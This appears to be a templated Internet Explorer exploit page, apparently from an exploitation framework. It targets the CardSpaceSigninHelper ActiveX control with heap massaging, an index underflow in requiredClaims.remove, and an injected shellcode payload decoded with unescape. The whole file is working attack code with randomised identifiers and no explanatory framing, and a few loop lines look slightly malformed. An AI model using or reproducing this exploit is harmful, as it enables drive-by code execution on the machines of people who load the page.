<html>
    <head>
    <META HTTP-EQUIV="PRAGMA" CONTENT="NO-CACHE">
    <META HTTP-EQUIV="CACHE-CONTROL" CONTENT="NO-CACHE">
    </head>
    <body>
    <object classid='clsid:19916E01-B44E-4E31-94A4-4696DF46157B' id='<%=symbols["CardSpaceSigninHelper"]%>'></object>
    <script language='JavaScript'>

    function <%=symbols["get_code"]%>(){
      var <%=symbols["code"]%> = unescape("<%=js_payload%>");
      return <%=symbols["code"]%>;
    }
    </script>
    <script language='vbscript'>
    On Error Resume Next
    Dim <%=symbols["massage_array_length"]%>,<%=symbols["underflow"]%>,<%=symbols["zero"]%>
    Dim <%=symbols["massage_array"]%>(5493)
    <%=symbols["massage_array_length"]%> = 5493
    <%=symbols["underflow"]%> = -7
    <%=symbols["zero"]%> = 0

    Set <%=symbols["required_claims"]%> = <%=symbols["CardSpaceSigninHelper"]%>.requiredClaims

    For i = <%=symbols["zero"]%> to <%=symbols["massage_array_length"]%>
      Set <%=symbols["massage_array"]%>(i) = document.createElement("object")
    Next

    For i = 4093 to <%=symbols["massage_array_length"]%> Step 2
      <%=symbols["massage_array"]%>(i) = Null
    Next

    For i = <%=symbols["zero"]%> to <%=symbols["underflow"]%> Step -1
      <%=symbols["required_claims"]%>.remove(CLng(i))
    Next

    Dim <%=symbols["my_code"]%>
    <%=symbols["my_code"]%> = <%=symbols["get_code"]%>()
    <%=symbols["required_claims"]%>.add(<%=symbols["my_code"]%>)

    For i = <%=symbols["zero"]%> = 0 to <%=symbols["massage_array_length"]%>
      if <%=symbols["massage_array"]%>(i) <> Null Then
        <%=symbols["massage_array"]%>(i).focus
      End If
    Next

    For i = <%=symbols["zero"]%> = 0 to <%=symbols["massage_array_length"]%>
      <%=symbols["massage_array"]%>(i) = Null
    Next

    </script></body></html>